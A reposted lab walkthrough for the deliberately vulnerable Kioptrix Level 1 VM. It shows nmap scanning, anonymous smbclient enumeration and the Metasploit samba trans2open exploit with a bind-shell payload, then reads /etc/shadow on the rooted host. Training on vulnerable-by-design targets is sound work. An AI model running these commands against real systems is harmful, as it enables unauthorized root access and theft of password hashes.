HOWTO : Kioptrix - Level 1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here


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Brief Overview

Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.


Scan network for hosts (nmap)

Scan target for running services (nmap)

Detect network shares (smbclient)

Exploit samba weakness, Trans2open (Metasploit)

Game Over

What do I need?

Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)

VMware player OR workstation. Download here

nmap – (Can be found on BackTrack 4-R2). Download here

smbclient – (Can be found on BackTrack 4-R2). Download here

metasploit – (Can be found on BackTrack 4-R2). Download here


A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target ( By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:

* OS: Linux v2.4.x (2.4.9-18)

* Samba: Samba smbd (wordgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:

* Anonymous login

* Hostname (KIOPTRIX)

* Workgroup (MYGROUP)

* Defautl hidden admin shares (IPC$, ADMIN$)

The attacker proceeds begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.



dhclient eth0


nmap 192.168.0.* -n -sn -sP

nmap -T4 -O -sV -sS #-sC -A -p- -v

#nmblookup -A # Hostname

smbclient -L \\ -N # What services are available on a server



search samba

use linux/samba/trans2open


show options


show options


#msfcli linux/samba/trans2open RHOST= PAYLOAD=generic/shell_bind_tcp E #PAYLOAD=linux/x86/shell_bind_tcp


uname -a

cat /etc/shadow

cat /etc/issue

That's all! See you.